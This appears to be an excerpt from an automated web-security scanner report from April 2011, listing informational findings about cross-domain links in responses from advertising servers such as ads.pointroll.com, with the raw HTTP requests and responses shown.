var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=55;1=2;2=1;s=376;g=172;m=34;w=51;i=55;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-BAE5-EFBE-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.80. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:51|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=53%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=53%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.18911003697494894 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-E3E4-A84E-1209-8C0000510101; PRca=|AKKi*9708:24|AKEA*263:1|#; PRcp=|AKKiAC6a:24|AKEAAAEP:1|#; PRpl=|FQue:18|FQud:6|FFCo:1|#; PRcr=|GKiM:18|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:18|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:51:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-6EE5-084F-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:25|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:25|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:19|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:19|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:19|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=53;1=2;2=1;s=376;g=172;m=34;w=51;i=53;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-6EE5-084F-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.81. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:49|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=39%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=39%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.47491930224680156 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-CEDF-B5DD-1209-8C0000510101; PRca=|AKKi*9708:15|AKEA*263:1|#; PRcp=|AKKiAC6a:15|AKEAAAEP:1|#; PRpl=|FQue:9|FQud:6|FFCo:1|#; PRcr=|GKiM:9|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:9|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:49:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-A2E0-3672-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:16|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:16|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:10|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:10|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:10|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=39;1=2;2=1;s=376;g=172;m=34;w=51;i=39;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-A2E0-3672-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.82. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:50|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=52%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=52%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.19753407107208165 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-73E2-7B60-1209-8C0000510101; PRca=|AKKi*9708:22|AKEA*263:1|#; PRcp=|AKKiAC6a:22|AKEAAAEP:1|#; PRpl=|FQue:16|FQud:6|FFCo:1|#; PRcr=|GKiM:16|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:16|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:50:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-96E4-5C0B-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:23|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:23|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:17|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:17|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:17|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=52;1=2;2=1;s=376;g=172;m=34;w=51;i=52;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-96E4-5C0B-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.83. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:50|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=52%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=52%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.38764945043658516 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-96E4-5C0B-1209-8C0000510101; PRca=|AKKi*9708:23|AKEA*263:1|#; PRcp=|AKKiAC6a:23|AKEAAAEP:1|#; PRpl=|FQue:17|FQud:6|FFCo:1|#; PRcr=|GKiM:17|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:17|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:50:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-E3E4-A84E-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:24|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:24|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:18|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:18|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:18|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=52;1=2;2=1;s=376;g=172;m=34;w=51;i=52;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-E3E4-A84E-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.84. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256655V79920110413152406&flash=0&time=0|11:46|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931285%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=9%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=9%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=$CTURL$&r=0.13928510174503333 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-B2D5-00C3-1209-8C0000530202; PRca=|AKKi*9708:1|AKEA*263:1|#; PRcp=|AKKiAC6a:1|AKEAAAEP:1|#; PRpl=|FQud:1|FFCo:1|#; PRcr=|GKiO:1|GEHc:1|#; PRpc=|FQudGKiO:1|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:46:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2479
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-04D6-AB56-1209-8C0000530101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:2|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:2|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQud:2|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiO:2|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQudGKiO:2|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=931285;n=809;x=2304;c=809001050,809001050;g=172;i=9;1=2;2=1;s=376;g=172;m=34;w=51;i=9;u=xlO0TcGt89Z-t7Q0A2jzc9p9~042411;k=http://clk.pointroll.com/bc/?a=1471150&c=1&i=ACA10400-04D6-AB56-1209-8C0000530101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256655%26adid=1471150'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861122/Premium_300x250_Dft.jpg?PRAd=1471150&PRCID=1471150&PRplcmt=
...[SNIP]...

23.85. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:47|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931287%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=11%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=11%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.9557037013621978 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-BCD8-86E6-1209-8C0000530101; PRca=|AKKi*9708:6|AKEA*263:1|#; PRcp=|AKKiAC6a:6|AKEAAAEP:1|#; PRpl=|FQue:1|FQud:5|FFCo:1|#; PRcr=|GKiM:1|GKiO:5|GEHc:1|#; PRpc=|FQueGKiM:1|FQudGKiO:5|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:47:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-CBD8-7D23-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:7|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:7|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:2|FQud:5|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:2|GKiO:5|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:2|FQudGKiO:5|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=931287;n=809;x=1792;c=809001050,809001050;g=172;i=11;1=2;2=1;s=376;g=172;m=34;w=51;i=11;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-CBD8-7D23-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.86. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:47|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931287%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=12%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=12%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.387190210819744 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-CBD8-7D23-1209-8C0000510101; PRca=|AKKi*9708:7|AKEA*263:1|#; PRcp=|AKKiAC6a:7|AKEAAAEP:1|#; PRpl=|FQue:2|FQud:5|FFCo:1|#; PRcr=|GKiM:2|GKiO:5|GEHc:1|#; PRpc=|FQueGKiM:2|FQudGKiO:5|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:47:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-75D9-0597-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:8|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:8|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:3|FQud:5|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:3|GKiO:5|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:3|FQudGKiO:5|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=931287;n=809;x=1792;c=809001050,809001050;g=172;i=12;1=2;2=1;s=376;g=172;m=34;w=51;i=12;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-75D9-0597-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.87. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?pixid=99003145 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2769103;type=tui-t329;cat=truec214;ord=1;num=9268942088820.041?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7e-J^1^1; ug=wJ6hSWn821G3dA; smdmp=7e-J:811200901; adf=7e-J^0^0

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Mon, 25 Apr 2011 00:34:27 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;c15=&amp;cv=2.0&amp;cj=1">here</a>
...[SNIP]...

23.88. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

